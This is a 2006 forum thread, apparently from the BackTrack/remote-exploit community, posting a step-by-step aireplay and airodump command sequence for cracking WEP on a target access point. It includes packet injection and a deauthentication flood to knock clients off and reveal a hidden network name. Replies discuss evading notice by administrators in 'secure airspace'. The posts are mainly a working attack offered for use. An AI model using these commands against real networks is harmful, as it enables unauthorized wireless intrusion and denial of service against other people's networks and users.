An even quicker way of cracking WEP with B|T

flame · #1 (**permalink**) 03-09-2006, 11:55 PM

This is a guide for all those REALLY lazy people out there, who come into #remote-exploit complaining that they dont understand the guides on here.
Granted, you people should be directed to www.google.com, or shot... which ever works best.

However! If this will save me some time explaining later... im all for it.

FIRST NOTE:
My laptop which I use backtrack on is poop. So I try not to run X whenever possible, so for this guide, lets just assume that you're running it CLI style

For this tutorial I am using a Proxim Orinoco Gold card (8470-WD)
This device runs on ath0.

SECOND NOTE:
someone buy me a nice laptop!

###############################
login to system
airodump ath0 outfile 0 1

ALT F2

login to system
aireplay ath0 -1 0 -e TARGETESSID -a TARGETBSSID -h CLIENTMAC/0:1:2:3:4:5
aireplay ath0 -3 -e TARGETESSID -b TARGETBSSID -h CLIENTMAC/0:1:2:3:4:5 -x 985

If youre close enough to the AP, the AP isnt heavily protected against packet injection, AND youve got a rough idea what youre doing, you should see the IV's flying up in ALT F1 (airodump).
If not, unlucky, wont work this time. May I suggest you read up on what youre doing and find a better way of doing it.

SIDE NOTE: If the AP youre targetting does not broadcast its ESSID, run:
aireplay ath0 -0 135 -a BSSID -h CLIENTMAC/0:1:2:3:4:5

this should deauth clients, forcing them to reconnect, and theres a chance you'll pick up the ESSID during this process.

Goodluck!

TheGreatVirus · #2 (**permalink**) 03-09-2006, 11:56 PM

Gives flame a Gold Star thanks for keeping it easy for the lazy people.

HTSPilot · #3 (**permalink**) 03-10-2006, 12:10 AM

As far as I know, Kismet will find the SSID of APs. Mine doesnt broadcast, but given about 30 seconds, Kismet identifies my ID.

flame · #4 (**permalink**) 03-16-2006, 08:42 PM

k, well kismet can do it sometimes, but ive found the best way of getting a hidden essid is to deauth bomb the target :S but use whatever works best for you

TheGreatVirus · #5 (**permalink**) 03-16-2006, 08:44 PM

If you issue too many DeAuths in secure airspace you may alert an Admin to your presence. Beware!

HTSPilot · #6 (**permalink**) 03-16-2006, 09:45 PM

Doesnt suprise me, but could you tell me what signs I'd expect to see? I've deauth my computer many times. I'd run the command, and if when it completes I dont get ARP packets, I'd issue it again. Sometimes doing it 5 or more times with 10 deauths. Never did I loose connectivity on MSN or have Windows warn me I lost connection.

Im assuming its all in router logs?

Thread Tools
Show Printable Version Email this Page
Display Modes
Linear Mode Switch to Hybrid Mode Switch to Threaded Mode